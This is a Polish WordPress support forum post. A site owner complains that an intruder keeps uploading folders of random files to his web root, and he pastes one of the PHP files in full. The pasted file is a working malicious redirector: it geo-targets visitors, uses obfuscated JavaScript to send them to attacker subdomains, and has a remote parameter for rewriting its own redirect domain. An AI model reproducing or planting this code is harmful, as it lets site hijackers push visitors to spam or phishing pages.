Wsparcie » Uwagi » Haker wgrywa folder z plikami do katalogu głównego

Haker wgrywa folder z plikami do katalogu głównego

  • Krzysztof

    (@autori76)


    7 years, 10 months temu

    Witam
    Usuwam foldery a on codziennie wgrywa. Foldery mają losowe nazwy i pliki chyba też. Są tam pliki .dat, .inc, png i .php
    Wkleję php

    <?php

/*domain
mail.com
domain*/

include_once 'Ih0Ak2KYvbdt.inc';

$white_countries = array('SE', 'FI', 'BG');

$sd_param = "ehohog43";

if ((isset($_GET['action'])) && ($_GET['action'] == 'unsubscribe'))
{
	echo "unsubscribed";
	exit(0);
}

if ((isset($_GET['id'])) && (!empty($_GET['id'])))
    $enc_id = @base64_encode($_GET['id']);
else
    $enc_id = '';

$red_host = "mail.com";

if ((isset($_GET[$sd_param])) && (!empty($_GET[$sd_param])))
{
    $self = __FILE__;
    $script = file_get_contents($self);

    if (preg_match("/\/\*domain(.*)domain\*\//s", $script, $matches))
	{
        $old_domain = trim($matches[1]);
        $script = preg_replace("/".preg_quote($old_domain)."/im", $_GET[$sd_param], $script);
        file_put_contents($self, $script);
        exit("OK");
    }
}

$fake_script = gen_rnd_str(4, 8).".php";
$subdomain = gen_rnd_str(3, 4);
$full_url = "http://$subdomain.$red_host/$fake_script?id=$enc_id";

$ip = get_ip();
$country = get_country($ip);

if (in_array($country, $white_countries) === false)
	$full_url = "http://google.com/";

function gen_rnd_str($min, $max)
{
    $only_alphabet = 'abcdefghijklmnopqrstuvwxyz';
    $characters = '0123456789abcdefghijklmnopqrstuvwxyz';
    $randstring = '';
    $len = rand($min, $max);
    $randstring = $only_alphabet[rand(0, strlen($only_alphabet) - 1)];
    for ($i = 1; $i < $len; $i++) $randstring .= $characters[rand(0, strlen($characters) - 1)];
    return $randstring;
}

function get_ip()
{
	if (isset($_SERVER["HTTP_X_REAL_IP"]))
		$ip = $_SERVER["HTTP_X_REAL_IP"];
	elseif (isset($_SERVER["HTTP_X_FORWARDED_FOR"]))
		$ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
	else
		$ip = $_SERVER['REMOTE_ADDR'];

	return $ip;
}

function get_country($ip)
{
	$gi = geoip_open("GkUWjDl0hbp.dat", GEOIP_STANDARD);

	if ($gi)
	{
		$country = geoip_country_code_by_addr($gi, $ip);
		geoip_close($gi);

		if (!$country)
			$country = "NA";

		return $country;
	}

	return false;
}

?>
<DOCTYPE html PUBLIC "-//W3C//DTDXHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
    <noscript>
        <meta http-equiv="refresh" content="0; url=<?php echo $full_url; ?>"/>
    </noscript>
    <title><?php echo gen_rnd_str(4, 8); ?></title>
</head>
<body>
<script language="JavaScript" type="text/javascript">
var _0x9129=["<?php echo $full_url; ?>","\x72\x65\x70\x6C\x61\x63\x65","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];window[_0x9129[2]][_0x9129[1]](_0x9129[0]);
</script>
</body>
</html>

Viewing 1 replies (of 1 total)
Viewing 1 replies (of 1 total)
  • Temat ‘Haker wgrywa folder z plikami do katalogu głównego’ jest zamknięty na nowe odpowiedzi.

Wyświetlenia